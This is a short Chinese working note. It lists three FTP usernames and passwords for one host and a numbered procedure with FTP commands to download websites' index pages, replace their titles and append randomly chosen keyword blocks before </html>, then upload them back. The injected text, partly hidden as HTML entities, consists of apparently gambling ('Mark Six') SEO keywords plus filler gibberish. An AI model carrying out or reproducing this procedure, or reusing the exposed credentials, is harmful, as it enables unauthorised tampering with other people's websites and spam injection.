021king:20fafb046250e1@hkns1.7itt.com
021hanyu1:201524c803bc93@hkns1.7itt.com
2che168888:203c5d6dcfd9b9@hkns1.7itt.com

FTP,POST

0/ftp hkns1.7itt.com
1\登录成功
2\检索目录  web   
3\是否存在指定的文本
default.asp  index.htm  index.html index.asp index.aspx
4\如果存在，下载文件

5\查找关键词，并替换
<title>asdasd</title>
替换为指定的内容，随机抽1个。



6、在</html>前，增加指定的文本。
随机抽5～6个

7、上传。
更换文件内容成提供的关键词




ftp hkns1.7itt.com
username
password
ls
cd web
ls 
get default.asp
	<--edit-->
put default.asp




<title>&#20020;&#27494;&#36890;&#22825;&#25253;&#44;&#20845;&#21512;&#22312;&#32447;&#44;&#19977;&#20116;&#22270;&#24211;&#44;&#20845;&#21512;&#31070;&#31461;</title>
<keyword>&#20020;&#27494;&#36890;&#22825;&#25253;&#44;&#20845;&#21512;&#22312;&#32447;&#44;&#19977;&#20116;&#22270;&#24211;&#44;&#20845;&#21512;&#31070;&#31461;</keyword>
<meat>&#20020;&#27494;&#36890;&#22825;&#25253;&#44;&#20845;&#21512;&#22312;&#32447;&#44;&#19977;&#20116;&#22270;&#24211;&#44;&#20845;&#21512;&#31070;&#31461;</meat>

标题： 临武通天报,六合在线,三五图库,六合神童
关键字： 是的是的发生大幅
描述：斯蒂芬斯蒂芬斯蒂芬斯蒂芬

临武通天报,六合在线,三五图库,六合神童
是的是的发生大幅
斯蒂芬斯蒂芬斯蒂芬斯蒂芬

临武通天报,六合在线,三五图库,六合神童
是的是的发生大幅
斯蒂芬斯蒂芬斯蒂芬斯蒂芬

临武通天报,六合在线,三五图库,六合神童
是的是的发生大幅
斯蒂芬斯蒂芬斯蒂芬斯蒂芬





